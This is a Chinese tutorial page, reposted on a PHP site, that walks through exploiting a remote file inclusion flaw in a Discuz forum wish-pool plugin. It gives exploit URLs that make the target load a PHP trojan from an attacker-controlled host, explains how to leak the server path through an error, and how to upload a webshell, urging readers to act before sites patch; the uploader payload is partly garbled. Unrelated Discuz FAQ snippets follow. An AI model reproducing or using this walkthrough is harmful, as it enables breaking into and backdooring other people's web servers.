Discuz插件漏洞攻击_PHP教程-php教程-PHP中文網

首頁

後端開發

php教程

Discuz插件漏洞攻击_PHP教程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 13, 2016 pm 05:08 PM

discuz外掛攻擊有漏洞這個

PS：话说光这个漏洞《黑客X档案》都说了N遍，呵呵........
既然有人公布了,也有人连利用程序都写好了,那我也就公布吧!消息来源是鬼仔告诉我的,好像是火狐哪个大哥发现的洞,不太清楚了!
　　discuz论坛的许愿池插件在DZ根目录有个wish.php文件,文件第四行:
require $discuz_root.‘./include/discuzcode.func.php‘;
很明显程序没有做任何过滤,一个十足的远程包含漏洞,具体利用方法就很简单了:
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
别忘了后面有个问号!xxxx.txt就是我的PHP木马,c99shell不知道为什么,我没成功,也许与操作系统有关,我没仔细去实验了,直接用的安全天使的那PHP后门,不过可以得到一个"webshell",但是用安全天使那PHP后门无法上传我们真正的webshell上去,所以用下面这个文件就可以上传你的WEBSHELL到网站目录,
aidu.combscntink.php");?>

怎么得到网站实际路径呢?很简单,直接打开http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt ,不要最后那个问号,这时你会发现程序报错了,网站的实际路径也就出来了!修改个文件里的
C:Inetpubvhostsaidu.combs
为当前你要黑的这个网站实际路径;cntink.php是你上传webshell后需要保存的名字,随便你取什么!
　　把上面那文件保存为txt(其他扩展名也可以)上传到你自己的网站,比如我取名为fly.txt,现在再打开
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
OK...看见上传对话框了吧,慢慢上传你的webshell吧!上传后的路径就是你在fly.txt中所设置的路径!
　　以上文章纯属乱写,谁利用这方法黑了站遇到麻烦别找我....其实这玩意应该是发布补丁后才能公开的,但又不是官方的插件,而且别人都发了,无所谓了!
PS:要行动的快点,引用群里某X的一句话: baidu google都把discuz inurl：wish.php搜完了不过漏洞没补

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

discuz database error怎么解决Nov 20, 2023 am 10:10 AM

discuz database error的解决办法有：1、检查数据库配置；2、确保数据库服务器正在运行；3、检查数据库表状态；4、备份数据；5、清理缓存；6、重新安装Discuz；7、检查服务器资源；8、联系Discuz官方支持。解决Discuz数据库错误需要从多个方面入手，逐步排查问题原因，并采取相应的措施进行修复。

怎么去掉discuz版权Feb 24, 2023 am 09:15 AM

去掉discuz版权的方法：1、找到并打开“header_common.htm”文件，删掉“Powered by Discuz!”内容；2、找到并打开“footer.htm”文件，删掉“Powered by ME”内容即可。

discuz是什么意思Aug 23, 2023 am 10:27 AM

Discuz是一个功能强大的开源论坛软件，可以帮助用户快速搭建和管理一个社区论坛，提供了一套完整的论坛系统解决方案，Discuz是由名为Comsenz的中国公司开发和维护的，并且在全球范围内广泛使用。Discuz还有一个庞大的用户社区，可以提供技术支持和经验分享。

discuz论坛是什么Jul 10, 2023 am 11:03 AM

discuz论坛是一种网络论坛软件，也称BBS，它是一种用于在互联网上建立论坛社区的程序系统。只哟中功能强大的论坛软件，可以帮助用户建立一个专业、完善的论坛社区，并且可以实现多种功能，如搭建用户注册、登录、查看主题、发布帖子、发表评论、设置版主等功能，让用户可以轻松地进行论坛社区的管理和维护。

什么是discuzAug 23, 2023 am 10:24 AM

discuz是一种功能强大、灵活性高、安全稳定的开源论坛软件，是一个基于PHP和MySQL的在线社区平台，提供了一个完整的论坛系统，包括帖子、主题、用户管理、权限控制等功能。Discuz还具备良好的用户体验和界面设计，以及庞大的开发者社区，可以为用户提供帮助和支持。

discuz如何修改头像Aug 08, 2023 pm 03:53 PM

discuz修改头像的方法：1、登录Discuz后台，在网站根目录下找到“admin.php”或者“admin”目录并登录；2、进入用户管理，可以在左侧或者顶部的导航菜单中找到并点击进入；3、搜索用户，使用搜索功能来找到特定的用户；4、修改头像，在编辑页面，可以找到头像的选项并上传新的头像；5、保存修改；6、刷新页面即可。

discuz登录失败怎么解决Aug 03, 2023 pm 02:09 PM

discuz登录失败解决方法：1、仔细检查输入的用户名和密码是否正确，并尝试重置密码；2、确保浏览器允许使用Cookie，并将Discuz网站添加到信任的网站列表中；3、通过论坛首页上的“联系我们”或“举报”链接找到管理员的联系方式并解决；4、查看服务器日志来确定是否存在配置问题。

discuz附件在哪Aug 08, 2023 pm 02:08 PM

discuz附件在网站的根目录下，其路径类似于"/home/wwwroot/forum/data/attachment"，在这个目录下，每个附件都会有一个唯一的文件名，以确保文件的唯一性和安全性，附件通常是用户在帖子或私信中上传的文件，例如图片、音频或文档，附件的上传和管理是论坛功能的重要组成部分，使用户能够分享和交流各种类型的内容。

See all articles